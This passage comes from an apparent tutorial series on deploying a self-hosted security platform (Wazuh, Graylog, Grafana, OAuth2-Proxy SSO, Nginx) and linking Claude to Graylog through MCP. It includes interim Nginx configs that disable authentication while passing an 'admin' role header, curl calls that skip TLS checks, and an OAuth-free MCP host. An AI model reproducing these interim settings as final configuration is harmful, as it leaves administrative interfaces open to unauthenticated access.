/etc/nginx/TLS/certificate.crt;<br>  ssl_certificate_key /etc/nginx/TLS/private.key;<br>  include /etc/nginx/snippets/security-headers.conf;<br>  include /etc/nginx/snippets/oauth2-proxy.conf;<br>  location / {<br>   #auth_request /oauth2/auth;<br>   error_page 401 = /oauth2/start;<br>   auth_request_set $user $http_x_auth_user;<br>   proxy_set_header x-proxy-user $user;<br>   proxy_set_header x-proxy-roles "admin";<br>   proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;<br>   proxy_set_header X-Real-IP $remote_addr;<br>   proxy_http_version 1.1;<br>   proxy_read_timeout 10s;<br>   proxy_set_header Upgrade $http_upgrade;<br>   proxy_set_header Connection 'upgrade';<br>   proxy_set_header Host $host;<br>   proxy_cache_bypass $http_upgrade;<br>   proxy_set_header X-Forwarded-Proto $scheme;<br>   proxy_pass https://localhost:8080;<br>   access_log off;<br>   log_not_found off;<br>  }<br>}</pre><p><strong>Graylog Host</strong></p><pre># /etc/nginx/sites-available/graylog<br><br>server {<br>  listen 80;<br>  server_name graylog.&lt;domain.com&gt;;<br>  access_log off;<br>  log_not_found off;<br>  return 301 https://graylog.&lt;domain.com&gt;$request_uri;<br>}<br><br>server {<br>  listen 443 ssl;<br>  server_name graylog.&lt;domain.com&gt;;<br>  ssl_certificate /etc/nginx/TLS/certificate.crt;<br>  ssl_certificate_key /etc/nginx/TLS/private.key;<br>  include /etc/nginx/snippets/security-headers.conf;<br>  include /etc/nginx/snippets/oauth2-proxy.conf;<br>  location / {<br>   #auth_request /oauth2/auth;<br>   error_page 401 = /oauth2/start;<br>   auth_request_set $user $http_x_auth_user;<br>   proxy_set_header x-proxy-user $user;<br>   proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;<br>   proxy_set_header X-Real-IP $remote_addr;<br>   proxy_http_version 1.1;<br>   proxy_read_timeout 10s;<br>   proxy_set_header Upgrade $http_upgrade;<br>   proxy_set_header Connection 'upgrade';<br>   proxy_set_header Host $host;<br>   proxy_cache_bypass $http_upgrade;<br>   proxy_set_header X-Forwarded-Proto $scheme;<br>   proxy_pass http://localhost:9000;<br>   proxy_set_header X-Graylog-Server-URL https://$server_name;<br>   access_log off;<br>   log_not_found off;<br>  }<br>}</pre><p><strong>Graylog MCP Host</strong></p><pre># /etc/nginx/sites-available/graylog-mcp<br><br>server {<br>  listen 443 ssl;<br>  server_name graylog-mcp.&lt;domain.com&gt;;<br>  ssl_certificate /etc/nginx/TLS/certificate.crt;<br>  ssl_certificate_key /etc/nginx/TLS/private.key;<br>  include /etc/nginx/snippets/security-headers.conf;<br>  location  / {<br>   proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;<br>   proxy_set_header X-Real-IP $remote_addr;<br>   proxy_http_version 1.1;<br>   proxy_read_timeout 10s;<br>   proxy_set_header Upgrade $http_upgrade;<br>   proxy_set_header Connection 'upgrade';<br>   proxy_set_header Host $host;<br>   proxy_cache_bypass $http_upgrade;<br>   proxy_set_header X-Forwarded-Proto $scheme;<br>   proxy_pass http://localhost:9000/api/;<br>   access_log off;<br>   log_not_found off;<br>  }<br>}</pre><p><strong>Grafana Host</strong></p><pre># /etc/nginx/sites-available/grafana<br><br>server {<br>  listen 80;<br>  server_name grafana.&lt;domain.com&gt;;<br>  access_log off;<br>  log_not_found off;<br>  return 301 https://grafana.&lt;domain.com&gt;$request_uri;<br> }<br><br>server {<br>  listen 443 ssl;<br>  server_name grafana.&lt;domain.com&gt;;<br>  ssl_certificate         /etc/nginx/TLS/certificate.crt;<br>  ssl_certificate_key     /etc/nginx/TLS/private.key;<br>  include /etc/nginx/snippets/security-headers.conf;<br>  include /etc/nginx/snippets/oauth2-proxy.conf;<br>  location  / {<br>   #auth_request /oauth2/auth;<br>   error_page 401 = /oauth2/start;<br>   auth_request_set $user $http_x_auth_user;<br>   proxy_set_header x-proxy-user $user;<br>   proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;<br>   proxy_set_header X-Real-IP $remote_addr;<br>   proxy_http_version 1.1;<br>   proxy_read_timeout 10s;<br>   proxy_set_header Upgrade $http_upgrade;<br>   proxy_set_header Connection 'upgrade';<br>   proxy_set_header Host $host;<br>   proxy_cache_bypass $http_upgrade;<br>   proxy_set_header X-Forwarded-Proto $scheme;<br>   proxy_pass http://localhost:3000;<br>   access_log off;<br>   log_not_found off;<br>  }<br>}</pre><p>The auth_request is intentionally commented during initial configuration — it's enabled in the Authentication article, once all roles and users are configured in each application.</p><p><strong>graylog-mcp</strong>: a special virtual host without OAuth2 so Claude can access the Graylog MCP Bridge directly with Basic authentication. Covered in the Graylog MCP article.</p><pre># Create links<br><br>cd /etc/nginx/sites-enabled<br>ln -s ../sites-available/wazuh<br>ln -s ../sites-available/graylog<br>ln -s ../sites-available/graylog-mcp<br>ln -s ../sites-available/grafana</pre><p><strong>Configure certificates</strong></p><p><strong>/etc/nginx/TLS/certificate.crt</strong> — Site and intermediate certificates.<br><strong>/etc/nginx/TLS/private.key</strong> — Private key.</p><p><strong>TLS and verification</strong></p><pre># Certificate with restrictive permissions<br><br>chmod 400 /etc/nginx/TLS/*</pre><pre># Verify configuration before starting<br><br>nginx -t</pre><p>Expected response:</p><pre>nginx: the configuration file /etc/nginx/nginx.conf syntax is ok<br>nginx: configuration file /etc/nginx/nginx.conf test is successful</pre><pre># Restart<br><br>systemctl restart nginx</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/700/0*BLX_WJBjJLfvTMg2.png"></figure><h3>Troubleshooting Guide</h3><h3>Log Paths and Common Issues in a Complex Security Stack</h3><p><strong><em>Part 10</em></strong></p><p>When something fails in a stack of this complexity — and something always does — knowing exactly where to look for information is the difference between resolving the problem in five minutes or an hour. This article documents the log paths for all components and the most common problems encountered during implementation.</p><p><strong>Real-time log monitoring</strong></p><p>To monitor any service in real time.</p><pre># Filtered error warn<br>journalctl -u &lt;service&gt; | grep -i -E "error|warn"<br><br># Limit the number of the last events shown<br>journalctl -u &lt;service&gt; -n &lt;number&gt;<br><br># Show only the most recent journal entries, and continuously print new entries<br>journalctl -fu &lt;service&gt;<br><br># Jump to the end and augment log lines with explanation texts from the message catalog<br>journalctl -xeu &lt;service&gt;</pre><p>Where &lt;service&gt; can be any of the following:</p><ul><li>wazuh-dashboard</li><li>wazuh-indexer</li><li>wazuh-manager</li><li>graylog-server</li><li>mongod</li><li>grafana-server</li><li>oauth2-proxy</li><li>fluent-bit</li><li>nginx</li><li>redis-server</li></ul><p><strong>Log file paths<br></strong>For direct access to log files:</p><pre>tail -f &lt;path&gt;</pre><ul><li>Wazuh-Indexer /log/wazuh-indexer/wazuh-cluster.log</li><li>Graylog /log/graylog/server.log</li><li>MongoDB /log/mongodb/mongod.log</li><li>Grafana /log/grafana/grafana.log</li><li>Fluent Bit /log/fluent-bit/td-agent-bit.log</li><li>OAuth2-Proxy /log/oauth2-proxy/oauth2.log</li><li>Nginx /log/nginx/error.log</li><li>Redis /log/redis/redis-server.log</li></ul><p><strong>Known issue: unexpected server restart</strong></p><p><strong>Symptom:</strong> Wazuh Manager fails to start after an unexpected server restart. The log shows:</p><pre>ERROR: Another instance is locking this process. If you are sure that<br>no other instance is running, please remove<br>/var/ossec/var/start-script-lock/</pre><p><strong>Cause:</strong> Wazuh creates a lock directory when starting and removes it on clean shutdown. If the server restarts abruptly (power cut, OOM killer, etc.), the directory remains and the next startup fails.</p><p><strong>Solution:</strong> Remove the lock directory manually and start service.</p><pre>rm -rf /var/ossec/var/start-script-lock/<br>systemctl start wazuh-manager</pre><p><strong>Recommended diagnostic approach</strong></p><p>When something isn’t working, the recommended review order is:</p><ol><li><strong>Is the service running?</strong> systemctl status &lt;service&gt;</li><li><strong>Any recent errors?</strong> journalctl -xeu &lt;service&gt; --since "10 minutes ago"</li><li><strong>Does the service’s own log file have more detail?</strong> tail -50 &lt;log_path&gt;</li><li><strong>For network issues between components:</strong> verify ports are listening<br>ss -tlnp | grep &lt;port&gt;</li><li><strong>For authentication issues:</strong> check the OAuth2-Proxy log and the headers Nginx is sending.</li></ol><p>The most frequent problems in this implementation were:</p><ul><li>Incorrect indentation in fluent-bit.conf (service starts without errors but doesn't process data).</li><li>Wazuh TLS certificate not included in Graylog’s JKS (connection silently rejected).</li><li>Service startup order: MongoDB must be running before Graylog.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/700/0*Fx4TRiVvV9Z3fiR3.png"></figure><h3>Authentication: SSO and Integration Graylog with Wazuh</h3><p><strong><em>Part 11</em></strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*wl3X9Hdfe8RZMX7lY0agwQ.jpeg"></figure><p>This is the most complex article in the series. Up to this point, all components are installed, but each has its own authentication system. The goal of this article is to configure the three solutions to accept the user identity propagated by OAuth2-Proxy via Nginx — completely eliminating local passwords from the daily login cycle.</p><blockquote><em>⚠</em><strong><em> Important</em></strong><em>:</em> Follow the order A-&gt;B-&gt;C-&gt;D. Configuring proxy authentication on a system before the user has been created will result in loss of access.</blockquote><blockquote>Verify the response of each curl command before proceeding.</blockquote><pre># Create random passwords for users<br><br>cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 16 | head -n 1</pre><p><strong>How Proxy Authentication Works</strong></p><p>The mechanism is as follows: Nginx validates the user’s identity with OAuth2-Proxy and then injects the username as an HTTP header x-proxy-user in each request to applications. Each application must be configured to trust this header and automatically assign roles.</p><p><strong>Continue with the following four steps:</strong></p><h4>11-A. Wazuh OAuth2</h4><pre># Reload systemctl and start services<br><br>systemctl daemon-reload<br>systemctl start oauth2-proxy wazuh-manager wazuh-indexer wazuh-dashboard</pre><blockquote>Startups may take some time. Check the logs for errors before continuing.</blockquote><p><strong>Creating Role Mapping</strong></p><p>Wazuh needs a role mapping that associates the username propagated by the proxy with the administrator role.</p><p><strong>Option A — Web<br></strong>https://wazuh.&lt;domain.com&gt;/app/security#/security?tab=roleMapping</p><blockquote>Use the “admin” credential from the “wazuh-passwords.txt” file.</blockquote><ul><li>Role mapping name: ProxyAuth</li><li>Roles: administrator</li><li>Custom rules → “Add new rule”</li><li>User field: user_name</li><li>Search operation: MATCH</li><li>Value: &lt;AD_user&gt;</li></ul><p><strong>Option B — API</strong></p><blockquote>Use the “wazuh-wui” credential from the “wazuh-passwords.txt” file.</blockquote><pre># Generate token<br><br>token=$(curl -u wazuh-wui:&lt;password&gt; -k -X POST "https://localhost:55000/security/user/authenticate?raw=true")</pre><pre># Create rule<br><br>curl -k -X POST "https://localhost:55000/security/rules" \<br>-H "Authorization: Bearer $token" \<br>-H "Content-Type: application/json" \<br>-d '{<br>  "name": "ProxyAuth",<br>  "rule": {<br>    "MATCH": {<br>      "user_name": "&lt;AD_user&gt;"<br>    }<br>  }<br>}'</pre><blockquote>Rule created with ID: 100</blockquote><pre># Assign the rule to the administrator role<br><br>curl -k -X POST "https://localhost:55000/security/roles/1/rules?rule_ids=&lt;id_rule&gt;" \<br>-H "Authorization: Bearer $token" \<br>-H "Content-Type: application/json"</pre><p>— — — end options</p><p><strong>Configure proxy authentication in OpenSearch</strong></p><pre># /etc/wazuh-dashboard/opensearch_dashboards.yml - Add and replace (part of the file)<br><br>opensearch_security.auth.type: "proxy"<br>opensearch_security.proxycache.user_header: "x-proxy-user"<br>opensearch_security.proxycache.roles_header: "x-proxy-roles"<br>opensearch_security.proxycache.proxy_header: "x-forwarded-for"<br>opensearch_security.proxycache.proxy_header_ip: "127.0.0.1"<br>opensearch.requestHeadersAllowlist: ["securitytenant","Authorization","x-proxy-user","x-proxy-roles","x-forwarded-for"]</pre><pre># /etc/wazuh-indexer/opensearch-security/config.yml — Enable xff and proxy auth (part of the file)<br><br>xff:<br>  enabled: true<br>  internalProxies: '127\.0\.0\.1'<br><br>proxy_auth_domain:<br>  description: "Authenticate via proxy"<br>  http_enabled: true</pre><pre># /etc/nginx/sites-enabled/wazuh - Enable<br><br>auth_request /oauth2/auth;</pre><pre># Apply changes<br><br>cd /etc/wazuh-indexer/opensearch-security/<br>/usr/share/wazuh-indexer/plugins/opensearch-security/tools/securityadmin.sh \<br>  -cacert /etc/wazuh-indexer/certs/root-ca.pem \<br>  -cert /etc/wazuh-indexer/certs/admin.pem \<br>  -key /etc/wazuh-indexer/certs/admin-key.pem \<br>  -h 127.0.0.1<br>systemctl restart wazuh-dashboard nginx</pre><blockquote>As of now, Wazuh uses OAuth2-Proxy for authentication.</blockquote><p><strong>Custom Backend Roles</strong></p><p>If your goal is to replace the backend role hardcoded with a Group 365:</p><ul><li>In the App Entra ID, add Security Group ID in Token optional Group Claims (Token configuration).</li><li>Next, obtain the Object ID of group 365.</li><li>Duplicate the “all_access” role at: https://wazuh.&lt;domain.com&gt;/app/security-dashboards-plugin#/roles/duplicate/all_access and name it "Group365" for reference.</li><li>Then, go to the mapping page: https://wazuh.&lt;domain.com&gt;/app/security-dashboards-plugin#/roles/edit/Group365/mapuser and paste the Object ID into the Backend roles field.</li><li>In /etc/wazuh-indexer/opensearch.yml, add "Group365" to the list defined under plugins.security.restapi.roles_enabled.</li><li>In Nginx Wazuh Host set auth_request_set $roles $upstream_http_x_auth_request_groups and proxy_set_header x-proxy-roles $roles.</li><li>Restart wazuh-indexer and nginx systemctl restart wazuh-indexer nginx</li></ul><p><strong>References</strong></p><pre># /etc/nginx/sites-enabled/wazuh</pre><pre>location / {<br>   auth_request /oauth2/auth;<br>   error_page 401 = /oauth2/start;<br>   auth_request_set $user $http_x_auth_user;<br>   proxy_set_header x-proxy-user $user;<br>   <strong>auth_request_set $roles $upstream_http_x_auth_request_groups</strong>;<br>   <strong>proxy_set_header x-proxy-roles $roles</strong>;<br>   proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;<br>   proxy_set_header X-Real-IP $remote_addr;<br>   proxy_http_version 1.1;<br>   proxy_read_timeout 10s;<br>   proxy_set_header Upgrade $http_upgrade;<br>   proxy_set_header Connection 'upgrade';<br>   proxy_set_header Host $host;<br>   proxy_cache_bypass $http_upgrade;<br>   proxy_set_header X-Forwarded-Proto $scheme;<br>   proxy_pass <a href="https://localhost/">https://localhost:8080;</a><br>   access_log off;<br>   log_not_found off;<br>  }</pre><pre># /etc/wazuh-indexer/opensearch.yml</pre><pre>plugins.security.restapi.roles_enabled:<br>- "all_access"<br>- "security_rest_api_access"<br>- "<strong>Group365</strong>"</pre><p><strong>Alernative Map Nginx</strong></p><pre># /etc/nginx/nginx.conf</pre><pre>http {<br>  map $upstream_http_x_auth_request_email $http_x_auth_user {<br>    "~^(?&lt;user&gt;[^@]+)@" $user;<br>  }</pre><pre><strong>map $http_x_auth_user $roles {<br>    "&lt;AD_user1&gt;" "&lt;group_object_id&gt;";<br>    "&lt;AD_user2&gt;" "readall";<br>  }</strong></pre><h4>11-B. Connect Graylog to Wazuh Indexer</h4><p><strong>Create user in Wazuh for Graylog</strong></p><blockquote>Graylog needs a user in Wazuh Indexer to be able to index logs.</blockquote><blockquote>Use the “admin” credential from the “wazuh-passwords.txt” file.</blockquote><blockquote>User defined “graylog” (or you can choose another name).</blockquote><p><strong>Option A — Web<br></strong>https://wazuh.&lt;domain.com&gt;/app/security-dashboards-plugin#/users</p><ul><li>Username: graylog</li><li>Password: &lt;password&gt;</li><li>Backend roles: admin</li></ul><p><strong>Option B — API</strong></p><pre># Create user<br><br>curl -k -X PUT "https://127.0.0.1:9200/_plugins/_security/api/internalusers/graylog" \<br>-H "Content-type: application/json" \<br>-u "admin:&lt;password&gt;" \<br>-d '{<br>  "password": "&lt;password&gt;",<br>  "backend_roles": ["admin"]<br>}'</pre><p>— — — end options</p><pre># /etc/graylog/server/server.conf - Enable ElasticSearch connection<br><br>elasticsearch_hosts = https://graylog:&lt;password&gt;@127.0.0.1:9200</pre><blockquote>Use “127.0.0.1” and not “localhost” — Wazuh’s TLS certificate requires the SAN (Subject Alternative Name) to match exactly.</blockquote><h4>11-C. Graylog OAuth2</h4><pre># Start services<br><br>systemctl start mongod graylog-server</pre><blockquote>Use the “admin” credential, <a href="https://infosecwriteups.com/open-source-security-platform-for-it-infrastructure-centralizing-threat-detection-logs-and-sso-c08d1b412f37#ce08">reference</a>.</blockquote><p><strong>Option A — Web</strong></p><p><strong>Enable header</strong><br>https://graylog.&lt;domain.com&gt;/system/authentication/authenticator/edit</p><ul><li>Enabled: ✓</li><li>Username header: x-proxy-user</li></ul><p><strong>Create user<br></strong>https://graylog.&lt;domain.com&gt;/system/users/new</p><ul><li>First Name: &lt;first_name&gt;</li><li>Last Name: &lt;last_name&gt;</li><li>Username: &lt;AD_user&gt;</li><li>E-Mail Address: &lt;email&gt;</li><li>Assign Roles: Admin</li><li>Password: &lt;password&gt;</li></ul><p><strong>Option B — API</strong></p><pre># Enable header<br><br>curl -X PUT "http://localhost:9000/api/system/authentication/http-header-auth-config" \<br>-H "Content-Type: application/json" \<br>-H "X-Requested-By: cli" \<br>-u "admin:&lt;password&gt;" \<br>-d '{<br>  "enabled": true,<br>  "username_header": "x-proxy-user"<br>}'</pre><pre># Create user<br><br>curl -X POST "http://localhost:9000/api/users" \<br>-H "Content-Type: application/json" \<br>-H "X-Requested-By: cli" \<br>-u "admin:&lt;password&gt;" \<br>-d '{<br>  "first_name": "&lt;first_name&gt;",<br>  "last_name": "&lt;last_name&gt;",<br>  "username": "&lt;AD_user&gt;",<br>  "email": "&lt;email&gt;",<br>  "password": "&lt;password&gt;",<br>  "roles": ["Admin"],<br>  "permissions": []<br>}'</pre><p>— — — end options</p><pre># /etc/graylog/server/server.conf -Enable and edit<br><br>trusted_proxies = 127.0.0.1/32</pre><pre># /etc/nginx/sites-enabled/graylog - Enable<br><br>auth_request /oauth2/auth;</pre><pre># Apply changes<br><br>systemctl restart graylog-server nginx</pre><h4>11-D. Grafana OAuth2</h4><pre># Start service<br><br>systemctl start grafana-server</pre><p><strong>Create user</strong></p><blockquote>Use the default “admin:admin” credential.</blockquote><p><strong>Option A — Web<br></strong>https://grafana.&lt;domain.com&gt;/admin/users/create</p><ul><li>Name: &lt;name&gt;</li><li>Email: &lt;email&gt;</li><li>Username: &lt;AD_user&gt;</li><li>Password: &lt;password&gt;</li></ul><p>Next screen:</p><ul><li>Enable "Grafana Admin” and change to "Admin" role.</li></ul><p><strong>Option B — API</strong></p><pre># Create user<br><br>curl -X POST "http://localhost:3000/api/admin/users" \<br>-H "Content-Type: application/json" \<br>-u "admin:&lt;password&gt;" \<br>-d ' {<br>  "name":"&lt;name&gt;",<br>  "email":"&lt;email&gt;",<br>  "login":"&lt;AD_user&gt;",<br>  "password":"&lt;password&gt;"<br>}'</pre><blockquote>Account created with ID: 2</blockquote><pre># Assign global admin<br><br>curl -X PUT "http://localhost:3000/api/admin/users/&lt;user_id&gt;/permissions" \<br>-H "Content-Type: application/json" \<br>-u "admin:&lt;password&gt;" \<br>-d '{<br>  "isGrafanaAdmin": true<br>}'</pre><pre># Assign organization administrator role<br><br>curl -X PATCH "http://localhost:3000/api/orgs/1/users/&lt;user_id&gt;" \<br>-H "Content-Type: application/json" \<br>-u "admin:&lt;password&gt;" \<br>-d '{<br>  "role":"Admin"<br>}'</pre><p>— — — end options</p><pre># /etc/grafana/grafana.ini - Enable and edit<br><br>[auth.proxy]<br>enabled = true<br>header_name = x-proxy-user<br>header_property = username<br>auto_sign_up = false<br>sync_ttl = 3600<br>whitelist = 127.0.0.1</pre><pre># /etc/nginx/sites-enabled/grafana - Enable<br><br>auth_request /oauth2/auth;</pre><pre># Apply changes<br><br>systemctl restart grafana-server nginx</pre><blockquote><em>⚠</em><strong><em> Important:</em></strong><em> </em>For security reasons, replace the default password for the user “admin”.</blockquote><figure><img alt="" src="https://cdn-images-1.medium.com/max/700/0*LlADIl-n2kYp6S5O.png"></figure><h3>Graylog Ingest: Configuring Data Ingest from Fluent Bit</h3><p><strong><em>Part 12</em></strong></p><p>With all components installed and SSO authentication configured, it’s time to connect the final wires: configure Graylog to receive the events that Fluent Bit sends from Wazuh, and activate all services so that the platform is fully operational.</p><p>Fluent Bit sends Wazuh events to “localhost:5555” in JSON format. Graylog needs an active input listening on that port to process them.</p><p><strong>Option A — Web interface:<br></strong>https://graylog.&lt;domain.com&gt;/system/inputs</p><ul><li>Select input type: Raw HTTP</li><li>Click “Launch new input”</li><li>Configure:<br><strong> </strong>Title<strong>:</strong> Wazuh<br><strong>Bind address:</strong> 127.0.0.1</li><li>Click “Launch Input”</li><li>Follow the wizard to start the input and verify your diagnosis.</li></ul><p><strong>Option B — API:</strong></p><pre># Create RAW HTTP input - Graylog admin credential<br><br>curl -X POST "http://localhost:9000/api/system/inputs" \<br>-H "Content-Type: application/json" \<br>-H "X-Requested-By: cli" \<br>-u "admin:&lt;password&gt;" \<br>-d '{<br>  "title": "Wazuh",<br>  "type": "org.graylog2.inputs.raw.http.RawHttpInput",<br>  "global": true,<br>  "configuration": {<br>    "bind_address": "127.0.0.1",<br>    "port": 5555,<br>    "recv_buffer_size": 1048576,<br>    "max_chunk_size": 65536<br>  }<br>}'</pre><blockquote>bind_address: 127.0.0.1 limits listening to the local interface — Fluent Bit runs on the same server, so there’s no need to expose the port externally.</blockquote><blockquote>Standard configuration uses the default stream.</blockquote><p>— — — end options</p><p>With the platform fully configured, we enable automatic service startup and start Fluent Bit to begin receiving events:</p><pre>systemctl enable fluent-bit mongod graylog-server grafana-server oauth2-proxy<br>systemctl start fluent-bit</pre><p>Order matters: MongoDB must be running before Graylog, and OAuth2-Proxy before Nginx. The “enable” command ensures that systemd respects dependencies on future server restarts.</p><p><strong>Verification: Is everything Working?</strong></p><p>Once all services are active, verify the complete flow:</p><ol><li><strong>Fluent Bit is reading Wazuh alerts</strong>:<br><em>tail -f /log/fluent-bit/td-agent-bit.log</em><br>You should see error-free processing lines.</li><li><strong>Graylog is receiving messages</strong>: In the web interface, navigate to Search and verify that messages with the source “wazuh” are arriving.</li><li><strong>SSO Authentication</strong>: Access <a href="https://site.domain.com/">https://site.domain.com</a> from your browser — it should redirect you to the IdP and then return authenticated.</li><li><strong>Grafana connected to Wazu</strong>h: In Grafana, configure a data source pointing to Wazuh and verify that it returns data.</li></ol><figure><img alt="" src="https://cdn-images-1.medium.com/max/700/0*_yPCjCev-1VHORsJ.png"></figure><h3>Graylog MCP + Claude: Querying Security Logs in Natural Language with AI</h3><p><strong><em>Part 13</em></strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*zafoeeMeYUR77NUv3B4o3w.jpeg"></figure><p>This is the most groundbreaking article in the series. The platform is already operational: Wazuh detects threats, Fluent Bit transports events, Graylog indexes them, and Grafana visualizes them. But there’s an additional layer that completely changes how we interact with security data: <strong>integrating Claude as an AI client on the Graylog REST API — MCP is more than an API; it’s a Bridge</strong>.</p><p><strong>What is MCP and why does it matter?<br></strong>MCP (Model Context Protocol) is a protocol that allows language models like Claude to connect directly with external tools and data sources. In this case, Graylog exposes its API as an MCP server, and Claude acts as an intelligent client that can query, filter, and analyze security logs.</p><p><strong>The change this produces is significant</strong>:</p><ul><li>Instead of building queries in the Graylog interface, the analyst writes in natural language: “<strong>Were there any failed login attempts in the last 2 hours?</strong>”</li><li>Instead of reviewing hundreds of log lines, Claude summarizes the relevant patterns and presents them in context.</li><li>Non-technical users — operators without SIEM experience — can interact directly with the security data.</li><li>Every query is logged in Graylog like any other API interaction, maintaining complete traceability.</li></ul><p><strong>Architecture of integration</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/325/1*S0hueQdlC9DM7gMt2rQ4IA.jpeg"></figure><p>A specific virtual host was created in Nginx “graylog-mcp” without OAuth2-Proxy — Claude authenticates directly with Basic credentials encoded in base64.</p><h3>Installation</h3><p><strong>On the client:</strong></p><ol><li><strong>NodeJS:</strong> <a href="https://nodejs.org/en/download">https://nodejs.org/en/download</a></li><li><strong>Claude Desktop:</strong> <a href="https://claude.com/download">https://claude.com/download</a></li></ol><h3>Configuration in Graylog</h3><p><strong>Step 1: Enable MCP in Graylog</strong></p><p>https://graylog.&lt;domain.com&gt;/system/configurations/MCP</p><p><strong>Step 2: Create a user token</strong></p><p>Navigate to https://graylog.&lt;domain.com&gt;/system/users → Actions → More → Edit tokens.</p><ul><li>Token Name: &lt;name&gt;</li><li>Token TTL: &lt;time&gt;</li></ul><blockquote>TTL Syntax Examples: for 60 seconds: PT60S, for 60 minutes: PT60M, for 24 hours: PT24H, for 30 days: P30D</blockquote><p><strong>Step 3: Base64 Encoding of Credentials</strong></p><p>The format is "&lt;token&gt;:token” encoded in base64.</p><pre>echo -n "&lt;token&gt;:token" | base64</pre><h3>Claude Desktop Configuration</h3><p>Edit the “claude_desktop_config.json” file in Claude Desktop, usually located in "%APPDATA%\CLAUDE\".</p><pre>{<br>  "mcpServers": {<br>    "Graylog": {<br>      "command": "C:\\Program Files\\nodejs\\npx",<br>      "args": [<br>        "mcp-remote",<br>        "https://graylog-mcp.&lt;domain.com&gt;/mcp",<br>        "--header",<br>        "Authorization: Basic &lt;credential_b64&gt;"<br>      ]<br>    }<br>  }<br>}</pre><blockquote>Replace <em>&lt;domain.com&gt;</em> with your actual domain and <em>&lt;credential_b64&gt;</em> with the base64 value generated in the previous step.</blockquote><p>Restart Claude Desktop and check the connection status in: <br><strong>Settings → Developer</strong></p><blockquote>The state should be running or refer to the logs.</blockquote><figure><img alt="" src="https://cdn-images-1.medium.com/max/982/1*zf7ollrjFRmyHYCdc_h86w.jpeg"></figure><h3>Real-world use cases</h3><p>Once connected, Claude can answer questions such as:</p><ul><li>“How many critical alerts did Wazuh generate today?”</li><li>“Are there any IPs that repeatedly attempted to connect without success?”</li><li>“Summarize the events of the last 30 minutes”</li><li>“Which services experienced errors in the last 6 hours?”</li></ul><p>The response is not a list of raw logs — it’s a natural language analysis with relevant patterns identified and contextualized.</p><h3>Security considerations</h3><ul><li>Access to graylog-mcp is restricted to HTTPS with a valid certificate.</li><li>Base64-encoded credentials are NOT encrypted — they are only encoded. True security lies in TLS and ensuring the endpoint is only accessible from the corporate network.</li><li>Every request from Claude is logged in the Graylog access log, maintaining a complete audit trail.</li><li>Rotating the token periodically is a best practice.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/700/0*7AWAjKALkSFXqCSq.png"></figure><h3>Final Architecture, evidences, and Conclusions: An Open Source Security Platform in Production</h3><p><strong><em>Part 14</em></strong></p><p>This is the final article in the series. After thirteen articles covering each component of the stack — from Wazuh to integration with Claude via MCP — it’s time to see the big picture and reflect on what worked, and what cost more than expected.</p><p><strong>Wazuh</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/969/1*G6ujNdCoZjnmY0KGutYgNA.jpeg"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*u3VN36Y05Vkaht3BXX6GEg.jpeg"></figure><p><strong>Graylog</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*2Nq4JG1ZvNYDUTqWPnv7Rg.jpeg"></figure><p><strong>Grafana</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*r6nrI73XCYVg_nZxowlhsQ.jpeg"></figure><p><strong>Claude</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/743/1*oUVy7cQSqs-d1XaWjqPVaw.jpeg"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/743/1*gSsxbeKhCf35sRQ6aouAlg.jpeg"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/740/1*xa9tIbOpgwLipnlUrvmV3g.jpeg"></figure><h3>The Complete Architecture</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*vmW0rU3czxIzuIfjyuSisw.jpeg"></figure><p>The diagram shows two main flows that coexist on the platform:</p><h3>Data Flow</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/618/1*SLgK1QVdKfN8UV1mCvb1mA.jpeg"></figure><p>Wazuh detects events and writes them in JSON format. Fluent Bit continuously reads this file and forwards each event to Graylog via TCP. Graylog indexes the data to Wazuh Indexer (returns the connection to OpenSearch). Grafana connects to Wazuh as a data source for dashboards. Claude accesses the Graylog MCP Bridge for natural language queries.</p><h3>Authentication Flow</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/532/1*-0uEx_oWBnDzzvJ60tbKnw.jpeg"></figure><p>The user accesses any of the three systems with their corporate account. Nginx queries OAuth2-Proxy on each request. OAuth2-Proxy validates the session (stored in Redis) or redirects to IdP for authentication. Once authenticated, Nginx propagates the username as an HTTP header to the corresponding application.</p><h3>Lessons Learned</h3><p><strong>What worked well:</strong></p><ul><li><strong>Separate LVM volumes</strong> — the best implementation decision. On three occasions, logs grew larger than expected; none of these affected the operating system or application data.</li><li><strong>Single authentication point</strong> — after the initial (and complex) setup, the user experience is seamless. One login for three systems.</li><li><strong>Fluent Bit vs. Filebeat</strong> — Fluent Bit’s resource consumption is significantly lower. On a shared server, this matters.</li><li><strong>Graylog MCP + Claude</strong> — the most differentiating component. It completely changed how non-technical users interact with security data.</li></ul><p><strong>What cost more than expected</strong>:</p><ul><li><strong>TLS between Graylog and Wazuh Indexer</strong> — the JKS and CA certificate import is the step with the most incorrect documentation online. The guide in this article reflects what actually works.</li><li><strong>Order of operations in Authentication</strong> — configuring the authentication proxy before creating users results in loss of access. The order matters.</li></ul><h3>Is it worth it?</h3><p>For an organization that wants true visibility into its infrastructure without paying for commercial SIEM tool licenses (which can cost tens of thousands of dollars annually), the answer is yes.</p><p>The real cost is implementation time and technical expertise. This well-documented stack can be replicated in a single workday using this guide. The necessary technical knowledge includes Linux administration, basic TLS concepts, and reading the official documentation.</p><p>What you get in return is a security platform with features comparable to commercial solutions, complete control over your data, no vendor lock-in, and the ability to extend it with any component you need.</p><h3>About this series</h3><p>This implementation was carried out in production for the IT Infrastructure. All documentation reflects real decisions, real 